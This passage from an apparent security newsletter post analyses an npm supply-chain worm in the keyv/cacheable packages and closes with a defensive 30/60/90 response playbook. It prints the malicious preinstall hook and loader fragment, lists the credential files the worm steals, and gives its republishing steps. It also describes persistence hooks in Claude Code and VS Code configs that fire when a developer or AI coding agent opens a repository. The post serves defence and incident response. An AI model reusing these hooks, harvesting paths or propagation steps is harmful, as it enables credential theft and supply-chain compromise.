class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-5" href="#footnote-5" target="_self">5</a> looks, to a casual audit, essentially like the previous release:  <code>dist/</code> output is <em>byte-identical</em> to the last clean version. (!) <br>The attack surface is two added files and a single modified field:</p><pre><code><code>"files": ["dist", "LICENSE", "setup.mjs", "Math_Symbol.js"],
"scripts": {
  "preinstall": "node setup.mjs"
}</code></code></pre><p><code>setup.mjs</code> <strong>is the first-stage loader.</strong> It is lightly obfuscated Node that detects platform and architecture (including Alpine/musl variants, via <span data-color="#134f5c" style="color: rgb(19, 79, 92);">ldd --version</span> and <span data-color="#134f5c" style="color: rgb(19, 79, 92);">/etc/os-release</span>), fetches a platform-matched standalone Bun runtime at version 1.3.13 if one is not already present, unzips it using system <code>unzip</code> on POSIX, PowerShell <code>Expand-Archive</code> on Windows, or a hand-written pure-JavaScript ZIP parser as a fallback, and then executes the second stage under the freshly fetched binary:</p><pre><code><code>const V = "1.3.13";
const E = "math_init.js";
const url = "https://github.com/oven-sh/bun/releases/download/bun-v" + V + "/" + target + ".zip";
// ...
execFileSync(bunBinary, [payloadPath], { stdio: "inherit", cwd: D });</code></code></pre><p><code>Math_Symbol.js</code> <strong>is the second stage</strong>, approximately 728 KB bundled. Wiz attributes the payload lineage to the &#8220;Mini&#8221; Shai-Hulud malware family, the same codebase that powered the TeamPCP campaign against Mistral, PyPi and TanStack packages back in May<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-6" href="#footnote-6" target="_self">6</a> and the Red Hat Cloud Services OIDC-bypass incident in June. The Shai-Hulud open-source repositories that TeamPCP published form the ancestor; this variant diverges on several specifics.</p><p>Running the second stage under a downloaded Bun binary sidesteps the host Node version and any Node-level process monitoring. The IOC for this is the process ancestry: <code>node setup.mjs</code> spawning a process under <code>/tmp/bun-dl-*/</code>. (If your EDR is not instrumenting that chain on build runners, you&#8217;re not seeing this attack.)</p><p>String protection uses polymorphic basE91 encoding with a shared numeric opcode table driving per-scope alphabets decoded lazily. Recovering the plaintext requires reimplementing basE91 and brute-forcing each alphabet. Socket&#8217;s reversers did this;<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-7" href="#footnote-7" target="_self">7</a> the resulting capability map is extensive to say the least. </p><p>Exfiltration avoids a fixed C2<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-8" href="#footnote-8" target="_self">8</a> host by reading target domains from an Ethereum smart contract (<code>StringListStore</code>) via <code>eth_call</code>. The on-chain history shows the contract was initialized with three domains before being updated to resolve only to <code>npm-cache[.]com</code> (104.21.35.216, behind Cloudflare). That the contract owner address had prior flagging as scam-associated is operationally significant: it means <strong>the operator can now rotate C2 infrastructure without touching the payload binary.</strong> Revocation and re-deployment of the malware are decoupled, which is a meaningful upgrade in operational security over hardcoded C2 addresses (for the attacker, that is.)</p><h2>Inspecting the Payload</h2><p><strong>The engineering elegance of the payload lies in its bootstrap mechanism</strong>. Once the preinstall hook executes, it immediately drops a standalone, single-binary Bun runtime directly into host memory or a local temporary directory.</p><p>By executing the secondary payload inside an isolated, bundled runtime rather than spawning standard Node sub-processes or shell utilities, the wurm exits the host&#8217;s process monitoring envelope entirely. Standard runtime application self-protection (RASP) agents, APM tooling, and process-tree telemetry looking for anomalous Node or bash children are rendered blind. The payload bypasses security controls by  running in an execution context the instrumentation was never configured to observe.</p><p><strong>To understand why traditional incident response playbooks failed</strong> during the incident, we need to examine the operational architecture of the payload&#8217;s four distinct modules: (bracketed names are from the wurm&#8217;s source code.) </p><ul><li><p><strong>The Harvester</strong><code> [collector]</code> avoids leaving artifacts on disk by scanning live process memory directly. In modern CI/CD runners, short-lived OIDC tokens exchanged with cloud providers reside in runner memory, not on disk where a scanner might find them. The harvester pulls ephemeral bearer tokens out of the execution context mid-build: AWS IMDS v1 and v2, the full credential chain from <code>~/.aws/credentials</code> and <code>~/.aws/config</code>, Secrets Manager across all regions, GCP service account private keys, Azure client secrets, Vault tokens at <code>/home/runner/.vault-token</code> and <code>/run/secrets/VAULT_TOKEN</code>, Kubernetes service account tokens at <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, GitHub Actions OIDC tokens, and a TruffleHog-style regex sweep for anything else on disk. New in this variant: AI agent credential stores for Claude Code, OpenAI, Codex, Cursor, and Gemini; cryptocurrency keystores for Foundry, Solana, and Monero; Jenkins <code>master.key</code>; Argo CD; Alibaba Cloud and Tencent Cloud CLI configs; <code>/etc/shadow</code>. Target surface expanded roughly 70% over prior Shai-Hulud releases.</p></li><li><p><strong>The Publisher</strong> <code>[publish] </code>avoids the credential your MFA policy actually protects. Propagation travels through npm publishing tokens, not GitHub account credentials, which means hardware-bound 2FA, YubiKeys, and phishing-resistant WebAuthn on the maintainer&#8217;s GitHub account are completely irrelevant. Once the wurm holds an active npm token, it calls:</p><pre><code><code>https://registry.npmjs.org/-/whoami
registry.npmjs.org/-/v1/search?text=maintainer:&lt;victim&gt;
https://registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/&lt;pkg&gt;</code></code></pre><p>    For each reachable package, it downloads the last clean tarball, injects <code>setup.mjs</code> and <code>Math_Symbol.js</code>, recomputes <code>integrity</code> and <code>shasum</code>, bumps the patch version, and issues a <code>PUT</code> to the registry &#8212; without ever touching the GitHub web UI. Where npm OIDC trusted publishing is configured, the republished version inherits valid provenance. That is how the wurm crossed namespace boundaries without requiring additional GitHub account compromises.</p><ul><li><p><span>If sufficient GitHub secrets were collected, a public GitHub repository is created through GitHub APIs, and the same encrypted results are committed to Dune-themed repository names such as </span><code>atreides-lasgun-393</code><span> or </span><code>gesserit-fedaykin-112</code><span>. (The naming corpus thankfully terminates before the Bene Tleilax begin making perfectly reasonable suggestions about futars</span><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-9" href="#footnote-9" target="_self">9</a>).</p></li></ul></li><li><p><strong>The Dispatcher</strong> <code>[dispatch] </code>avoids having a domain your abuse desk can find. Corporate security teams have spent two decades building domain-revocation playbooks: identify the C2 endpoint, file an abuse ticket with AWS or Cloudflare, watch the infrastructure go dark. Mini Shai-Hulud routes C2 state through an Ethereum smart contract (<code>StringListStore</code>) via <code>eth_call</code> instead. The on-chain history shows the contract initialized with three domains before updating to resolve only <code>npm-cache[.]com</code> (104.21.35.216). The operator rotates infrastructure without touching the payload binary. &#8220;There is no abuse desk for an Ethereum smart contract.&#8221;</p></li><li><p><strong>The Workstation Vector</strong> <code>[provenance] </code>avoids dying with the runner. Ephemeral CI/CD runners self-destruct after a build completes, which would normally halt a wurm&#8217;s persistence. Instead, the payload checks whether it is running on a developer machine and plants hooks in <code>.claude/settings.json</code> (<code>SessionStart</code>) and <code>.vscode/tasks.json</code> (<code>folderOpen</code>). Both execute <code>setup.mjs</code> when a developer or AI coding agent opens a cloned repository &#8212; no subsequent <code>npm install</code> required. The developer&#8217;s local environment becomes a persistent token harvester that re-infects every repository they open. Exfiltration goes via a <code>GitHubSender</code> that creates repositories under compromised identities using the GraphQL <code>createCommitOnBranch</code> mutation (description: <code>Shai-Hulud: Here We Go Again</code>) and a <code>DomainSender</code> over DNS as fallback.</p></li></ul><p>Persistence is planted in two locations that require no subsequent npm install to subsequently trigger:  <code>.claude/settings.json</code> receives a <code>SessionStart</code> hook and <code>.vscode/tasks.json</code> receives a <code>folderOpen</code> task. Both execute the same <code>setup.mjs</code> loader when a developer or an AI coding agent opens a cloned repository.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-10" href="#footnote-10" target="_self">10</a> </p><div class="pullquote"><p>Where npm OIDC trusted publishing is configured on the source repository,<br>the republished version can inherit valid provenance.</p></div><p>For each package reachable under the stolen identity, the payload downloads the last clean tarball, injects <code>setup.mjs</code> and <code>Math_Symbol.js</code>, recomputes <code>integrity</code> and <code>shasum</code> fields, bumps the patch version, and issues a <code>PUT</code> to the registry. Where npm OIDC trusted publishing is configured on the source repository, the republished version can inherit valid provenance. That is how the wurm crossed namespace boundaries without requiring additional GitHub account compromises: it propagated through npm tokens, not through GitHub credentials.</p><h3>Dead-Man&#8217;s Party</h3><blockquote><p>The wurm&#8217;s dead-man&#8217;s switch is its most operationally dangerous feature, the one most likely to cause harm during incident <strong>response</strong>. </p></blockquote><p><strong>When a security operations center detects an active credential leak,</strong> the universal, zero-reflection First Commandment of Incident Response is immediate, aggressive secret revocation: kill the tokens, drop the sessions, revoke the API keys.</p><p>Mini Shai-Hulud is aware of this, and contains a trap just for such response. </p><p>The dead-man's switch consists of a background daemon (<code>gh-token-monitor</code> systemd unit) that polls <code>api.github.com/user</code> every 60 seconds. The C2 can respond with a code value that arms the background monitor against a specific token, watching for a successful response from this endpoint. If that token is revoked,  the universal first action in any credential-leak playbook, the switch triggers and the daemon trips a destructive fallback: recursive wipes, corrupted git references, destroyed build state. Remediation response triggers detonation. </p><div class="pullquote"><p style="text-align: center;">  <strong> Find the switch before you revoke anything.</strong></p></div><p style="text-align: justify;">Socket&#8217;s guide is on point:<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-11" href="#footnote-11" target="_self">11</a> <strong>remove the switch before rotating credentials</strong>. The systemd unit describes itself as a &#8220;GitHub Token Validity Monitor.&#8221; It looks, at a glance, like a developer convenience. But no release tooling installs a background service that watches for its own credentials to be revoked. Stop the process in memory, kill the enumerated files on disk, and only then invalidate your keys.</p><h2>Signed Malware is Still Malware</h2><blockquote><p>This entire apparatus rests on a category error: confusing provenance with safety.</p></blockquote><p><strong>The industry&#8217;s response to five years of supply chain attacks has converged on</strong> a single architectural bet:  Sigstore, SLSA attestations, OIDC-bound GitHub Actions, and package signing now function as the default answer<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-12" href="#footnote-12" target="_self">12</a> to how a team verifies an artifact it didn&#8217;t build, confirming that a package was produced by a specific repository through an authorized pipeline so we can all feel a little better about it. </p><p>The <code>keyv</code> incident demonstrates the limits of that bet because the GitHub Actions workflow executed properly, the OIDC tokens were minted by the official identity provider, the build attestation was valid, and the registry verified the signature, so every automated tool in the pipeline judged the published artifact 100% authentic. That judgment was accurate on precisely its own terms: the malware was compiled and published by the legitimate, authorized pipeline. Since the attacker compromised the maintainer&#8217;s account and pushed directly to the primary branch, the pipeline processed that code with the same fidelity it would have applied to any legitimate commit. Flying blind but feeling good. </p><p>Snyk&#8217;s analysis showed<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-13" href="#footnote-13" target="_self">13</a> that npm manifest identifies GitHub Actions as the trusted publisher for keyv@6.0.0 (and even linked to an npm attestation, since removed.) This was apparently enough for the IDE persistence hooks to carry a green &#8220;verified&#8221; badge. So it&#8217;s not clear how much of this was just spoofing the text label, versus being able to masquerade as Github Actions bot. As we&#8217;ve previously discussed, GitHub signs commits created through its API while allowing the caller to supply the author field as free text, so a write-capable credential can manufacture a verified bot commit but also leading to the fun &#8220;Linus Torvalds is a committer to my repo&#8221; prank. </p><p>This is literally the Face Dancer problem from Heretics of Dune &#8212; in which the sandworms make a comeback after near extinction, and the Bene Tleilax who, having learned to synthetically manufacture spice melange, have created a new more advanced version of Face Dancers)<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-14" href="#footnote-14" target="_self">14</a> &#8212; transposed to build infrastructure. The commit passed verification because it had <em>become</em> the verified identity. The provenance chain had nothing to say about the substitution because the substitution was, by every measurable criterion, the real thing.</p><div class="pullquote"><p>The provenance chain remained intact end to end, and that chain simply <br>had no claim to make about who <strong>held</strong> the credential.</p></div><p>This points to the core architectural error. <strong>Provenance functions as an accountability trail rather than an isolation boundary:</strong> it answers who built this binary with mathematical certainty, and it has no mechanism for answering whether this binary will harvest environment variables or wipe a production database. Treating it as an execution boundary means using a high-assurance stamp to certify code that was never vetted, since the stamp confirms the pipeline that produced the artifact rather than the safety of what the artifact does, which is the actual trust boundary. </p><h2>Ambient Authority in Build Pipelines</h2><blockquote><p>In the npm ecosystem, trust is transitive, unbounded, and structurally asymmetric.  </p></blockquote><p>The deeper issue concerns how build environments get designed in the first place. Most modern CI/CD runners run compilation, dependency resolution, and deployment inside a single, undifferentiated security context, so that a <code>preinstall</code> script from a transitive dependency executes with the same privileges as the pipeline itself. Teams inherit this by default, the way you inherit a house&#8217;s wiring.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-15" href="#footnote-15" target="_self">15</a></p><p>That context typically holds everything worth stealing. Registry publishing tokens, cloud credentials, production database connection strings, and Vault tokens all sit inside the same environment that just ran code from a maintainer that went unvetted, over a network connection not being monitored, inside an execution environment that was implicitly trusted.</p><p>In this standard setup the runner treats trusted code and merely-executed code identically. Running an install command inside an environment built this way means importing thousands of transitive dependencies (each authored by someone with no relationship to your org) and granting every one of their scripts the same ambient access to your deployment secrets that your own pipeline operator holds. Are we starting to see the problem yet? As dependency trees deepen, this compounds: a typical project runs code from hundreds of indirect maintainers, none of whom anyone ever asked to hold the keys they now hold. </p><p>It doesn&#8217;t work to blame npm&#8217;s package manager, or maintainer carelessness, or a lack of developer education, or broken processes, or organizational culture, or individual mistakes, all of which misses where the fault actually hides. Ambient authority functions as a design pattern here, resting on an assumption that any code permitted to run inside the build context has earned the trust of the context itself.</p><div class="pullquote"><p>In Cargo and Go, a compromised transitive maintainer can ship you bad code. <br>In npm, they can also empty your AWS account.</p></div><p>Sure, structurally separating compilation authority from transport authority would change this calculus; routing package execution into network-isolated sandboxes with no embedded secrets and injecting credentials only downstream, after compilation completes. Absent that separation, the real attack surface of a signed release stays exactly what it&#8217;s always been: the entire transitive dependency graph of whoever holds the signing key. In Cargo and Go, a compromised transitive maintainer can ship you bad code. In npm, they can also empty your AWS account.</p><p>The reason npm remains a chronic crime scene while Rust&#8217;s Cargo or Go&#8217;s module system don&#8217;t isn&#8217;t that JavaScript developers are less security-conscious. It&#8217;s because npm was architected around implicit trust, unbounded dependency graphs, and ambient execution authority.</p><h2>Heretics of npm</h2><p>The Bene Tleilax of Dune engineered Face Dancers as perfect identity substitutions: shapeshifters who absorb their targets so completely that every available mechanism of recognition confirms the replacement as the original, because the question those systems ask is whether the presented identity matches the known one, and in every dimension available to measurement, it does. The advanced Face Dancers in <a href="https://luma.com/bshrou0b#:~:text=we%27ll%20be%20giving%20out%20a%20copy%20of%20Heretics%20of%20Dune">Heretics of Dune</a> (compared with their appearance in God Emperor) are specifically horrifying as no verification protocol can catch them. Verification confirms the Face Dancer because verification was built to confirm identity, which a Face Dancer *becomes.*<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-16" href="#footnote-16" target="_self">16</a></p><p>The spoofed <code>github-actions[bot]</code> commit with its green verified badge is that problem transposed to build infrastructure, which parallel is architectural rather than decorative. The pipeline ran correctly; the OIDC provider minted real tokens; the signature verified; the provenance attestation blessed the release; and the commit carrying IDE persistence hooks passed every check because it satisfied every check, because every check was asking whether the presented credential matched the authorized identity, and the answer was yes. Cryptographic provenance is precisely the verification layer a Face Dancer is engineered to satisfy. The substitution was, by every criterion the system had, the *real* thing. </p><p>The Bene Gesserit lived by the belief that better perception produced sufficiently certain knowledge; the Bene Tleilax's Face Dancers demonstrated that the gap between recognition and understanding is where catastrophic consequences occur. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!T2AH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!T2AH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg" width="727.9948120117188" height="447.4968109550057" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:895,&quot;width&quot;:1456,&quot;resizeWidth&quot;:727.9948120117188,&quot;bytes&quot;:651413,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/209855730?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbc19046e-bd52-42d1-983d-59822df34cfc_2048x1536.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!T2AH!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3f1d758-b325-4602-bbd6-1759344148d5_2021x1242.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Heretics of Dune &#169;1984 Frank Herbert, p. 84</figcaption></figure></div><h2>CTO Playbook: 30/60/90</h2><div class="callout-block" data-callout="true"><p style="text-align: justify;">The defining operational lesson of the keyv/cacheable compromise is that valid build provenance and active compromise are not mutually exclusive: a real maintainer account, a real GitHub Actions pipeline, a real OIDC-signed release, carrying a credential-stealing worm the entire time. Point-in-time signature checks fail here because they verify origin, not intent. This playbook sequences the response accordingly: irreversible actions close first, execution surface closes second, governance closes last. Nothing in the 30-day window is allowed to wait on forensics, including forensics.</p></div><p><code>UPDATE:</code><strong> </strong>npm has unpublished the malicious versions and rolled <code>latest</code> back to <code>5.6.0</code> across the family. As of this writing, <code>@cacheable/utils@2.5.1</code> remains live and poisoned. The <code>jaredwray/keyv</code> repository still contained the <code>.claude</code> and <code>.vscode</code> persistence directories on <code>main</code> at last check. Unpublished versions remain in any lockfile written during the window.</p><h3>Credential &amp; Blast-Radius Containment &#8212; 30 Days</h3><h4>Revoke Compromised Credentials Immediately (<span data-color="#ff0000" style="color: rgb(255, 0, 0);">Critical Priority</span>)</h4><p><em>Operant principle: revocation is the only action on this list that stops an active exfiltration channel. Everything else is forensics, and forensics can wait ninety seconds longer than a live token can.</em></p><ul><li><p><strong>Action:</strong> Revoke &#8212; not schedule for rotation, revoke now &#8212; every npm token, GitHub PAT, and OIDC-issued short-lived credential live on any runner or workstation that installed from <code>keyv</code>, <code>cacheable</code>, <code>cache-manager</code>, <code>cacheable-request</code>, <code>flat-cache</code>, <code>file-entry-cache</code>, or any <code>@cacheable/*</code> scope during the exposure window.</p></li><li><p><strong>Action:</strong> Roll every secondary infrastructure credential reachable from an exposed runner (AWS/GCP/Azure keys, HashiCorp Vault tokens, Kubernetes service account tokens).</p></li><li><p><strong>Note:</strong> Do this before hunting for local persistence artifacts, not after. The payload family ships a scare string in its commits warning defenders that revoking the key will crash production for other customers (indended to make you hesitate.) Don&#8217;t let a coercive string set your incident order of operations. If you have confirmed telemetry showing a specific local persistence mechanism, investigate it <em>after</em> revocation, not as a gate in front of it.</p></li><li><p><strong>Deliverable:</strong> Signed, timestamped credential-revocation log covering every runner and workstation identified as exposed.</p></li></ul><h4>Audit and Purge Poisoned Lockfiles (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High Priority</span>)</h4><p><em>Operant principle: caret ranges mean a clean install today can silently resolve to a poisoned version tomorrow.</em></p><ul><li><p><strong>Action:</strong> Run <code>npm ls keyv cacheable flat-cache cacheable-request file-entry-cache cache-manager @cacheable/utils</code> across every repository. Lockfiles generated during the infection window retain resolution pointers to malicious versions even after registry unpublication.</p></li><li><p><strong>Action:</strong> Pin all affected packages to a confirmed clean version, regenerate lockfiles from scratch, and block new-release resolution inside caret ranges at the registry proxy for the duration of the active window.</p></li><li><p><strong>Deliverable:</strong> Repo-by-repo lockfile audit with clean-version pins committed and verified.</p></li><li><p><strong>Research</strong>: Look at <a href="https://marketplace.visualstudio.com/items?itemName=about14sheep.tinynpm">tinyNpm plugin for VS Code</a><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-17" href="#footnote-17" target="_self">17</a> (and it&#8217;s <a href="https://open-vsx.org/extension/about14sheep/tinynpm">Open VSX</a>) which sets a buffer for how many days you want a package to be on npm before showing a new download is available. (Since most supply chain attacks are solved by npm in a few hours this seems like a sensible idea, though it&#8217;s obviously more guardrail than invariant.) NB. I have not conducted a security review of the <a href="https://github.com/about14sheep/tinyNpm">tinyNpm code repository</a>, so <em>Installator caveat</em>.</p></li></ul><h4>Sanitize IDE &amp; Workspace Persistence (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High Priority</span>)</h4><p><em>Operant principle: this campaign&#8217;s persistence targets are developer tooling configs, not just </em><code>node_modules</code><em> (audit accordingly.)</em></p><ul><li><p><strong>Action:</strong> Audit <code>.claude/settings.json</code>, Claude Code hooks, <code>.vscode/tasks.json</code>, and any local agent-hook configuration on every machine or workspace that cloned or installed packages from the affected family during the exposure window. Treat unfamiliar hooks as hostile until proven otherwise.</p></li><li><p><strong>Deliverable:</strong> Hook/config diff report per workstation. Unauthorized entries removed; any machine with an unexplained diff gets re-imaged rather than hand-cleaned.</p></li></ul><h4>Freeze Preinstall Script Execution (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High Priority)</span></h4><p><em>Operant principle: this is a policy flip, not an infrastructure migration, and it would have stopped the initial payload from ever running. Don&#8217;t let it near the 60-day bucket.</em></p><ul><li><p><strong>Action:</strong> Upgrade CI/CD and local toolchains to npm 12+, which blocks <code>preinstall</code>/<code>postinstall</code>/<code>prepare</code> lifecycle scripts by default unless explicitly allowlisted via <code>allowScripts</code>.</p></li><li><p><strong>Deliverable:</strong> Toolchain version audit confirming npm 12+ enforced across all CI runners and developer machines, with a human-reviewed exception list for any script that must still run.</p></li></ul><h3>Pipeline Hardening &amp; Runtime Isolation &#8212; 60 Days</h3><h4>Decouple Secrets from Build Environments (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operant principle: a build step with ambient credentials and unrestricted egress is a fully trusted execution context running untrusted code &#8212; that combination is the actual root cause here, not any single package.</em></p><ul><li><p><strong>Action:</strong> Reconfigure CI/CD so package installation and compilation execute in unprivileged, zero-secret containers with restricted outbound network access. Inject deployment credentials strictly into downstream transport steps, never into the build step itself.</p></li><li><p><strong>Deliverable:</strong> Build-stage architecture diagram showing secrets injected only after compilation completes, verified against a live pipeline.</p></li></ul><h4>Block Egress to Known Exfiltration Patterns (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operant principle: this campaign resolves its fallback C2 domain dynamically from a public blockchain smart contract specifically so static domain blocklists age out. Block the pattern, not the domain of the week.</em></p><ul><li><p><strong>Action:</strong> Restrict build-runner egress to an explicit allowlist (package registry, artifact store, known API hosts). Block outbound calls from build contexts to public blockchain RPC endpoints and to GitHub hosts outside your own org.</p></li><li><p><strong>Action:</strong> Alert on repository creation events, under any identity with write access to your org, matching known dead-drop naming conventions used by this campaign&#8217;s exfiltration channel.</p></li><li><p><strong>Deliverable:</strong> Egress allowlist enforced at the runner network layer, plus a live alerting rule in SIEM covering both patterns.</p></li></ul><h4>Implement Automated Pipeline Boundary Tests (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operant principle: a boundary you haven&#8217;t tested against a rogue package is a boundary you&#8217;re assuming holds.</em></p><ul><li><p><strong>Action:</strong> Add CI test suites that simulate rogue package execution, sandbox breakouts, and proxy bypasses prior to every release promotion.</p></li><li><p><strong>Deliverable:</strong> Boundary test suite gating release promotion, with results logged per release.</p></li></ul><h3>Governance &amp; Structural Resilience &#8212; 90 Days</h3><h4>Establish Private Package Proxy &amp; Delay Mirrors (<span data-color="#38761d" style="color: rgb(56, 118, 29);">Strategic Priority</span>)</h4><p><em>Operant principle: a worm</em><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-18" href="#footnote-18" target="_self">18</a><em> needs speed. A delay window is friction the attacker doesn&#8217;t get to route around.</em></p><ul><li><p><strong>Action:</strong> Route all external open-source dependency resolution through internal artifact mirrors enforcing automated static analysis and a vulnerability-delay window on new upstream package versions.</p></li><li><p><strong>Deliverable:</strong> Mirror live in production with delay policy documented and enforced org-wide.</p></li></ul><h4>Enforce Least-Privilege OIDC Roles (<span data-color="#38761d" style="color: rgb(56, 118, 29);">Strategic 